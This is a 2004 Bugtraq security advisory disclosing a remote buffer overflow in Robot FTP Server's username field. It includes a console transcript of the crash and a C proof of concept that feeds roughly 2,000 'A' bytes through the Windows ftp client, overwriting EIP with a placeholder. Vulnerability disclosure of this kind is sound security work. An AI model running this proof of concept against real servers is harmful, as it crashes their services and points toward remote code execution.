buffer overflow in Robot FTP Server

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: buffer overflow in Robot FTP Server
From: gsicht gsicht <nothing.king@xxxxxxxxxxx>
Date: 15 Feb 2004 12:39:39 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Application:  Robot FTP Server
              http://www.robotftp.com/
Versions:     1.0/2.0 beta 1 
Platforms:    Windows NT
Bug:          Buffer Overflow
Exploitation: remote
Date:         15 Feb 2004
Author:       gsicht
              e-mail: nothing.king@xxxxxxxxxxx

#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
Quoute from the Robot ftp's website:
"RobotFTP server is an FTP server that will transform any windows computer into 
an FTP site and enable distribution of files to co-workers or friends.

Robotftp Server is extremely easy to setup and configure. You can create 
password protected or anonymous accounts, specify folders and files that are 
accessible for each account, and monitor activities of connected users."

#######################################################################
======
2) Bug
======
I found a buffer overflow vulnerability in Robotftp server in the username 
fiehlt that allowes remote command execution. I only found this vulnerability 
with the windows ftp client. It doesn't work with netcat or telnet.

C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA>  
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>

#######################################################################
===========
3) The Code
===========
/******************************
this is example code for the vulnerability. It uses the windows ftp client to 
connect to a server
******************************/
#include <stdio.h>

char buffer[2500]; 
char cmd[50];

int main(int argc, char *argv[])
{
        FILE *evil;

        if(argv[1] == NULL)
        {
                printf("Usage: %s [IP]\n\n",argv[0]);
                return 0;
        }

        memset(buffer,0x41,47);
        memcpy(buffer+47,"\r\n",2);
        memcpy(buffer+49,"crash",5);
        memcpy(buffer+54,"\r\n",2);
        memcpy(buffer+56,"USER ",5);
        memset(buffer+61,0x41,1989);
        memset(buffer+61+1989,0x58,4);  // << overwrites the eip with XXXX
        memcpy(buffer+65+1989,"\r\n",2);

        sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);


        if((evil = fopen("ftp.txt", "a+")) != NULL)
        {
                fputs(buffer, evil);
                fclose(evil);
                printf("- file written!\n");
        }
        else
        {
                fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
                exit(1);
        }
        system(cmd);

}
/*******************************/
#######################################################################

Prev by Date: RE: W2K source "leaked"?
Next by Date: AllMyLinks PHP Code Injection vulnerability
Previous by thread: Fwd: Re: NT/W2K Source leak
Next by thread: AllMyLinks PHP Code Injection vulnerability
Index(es):
- Date
- Thread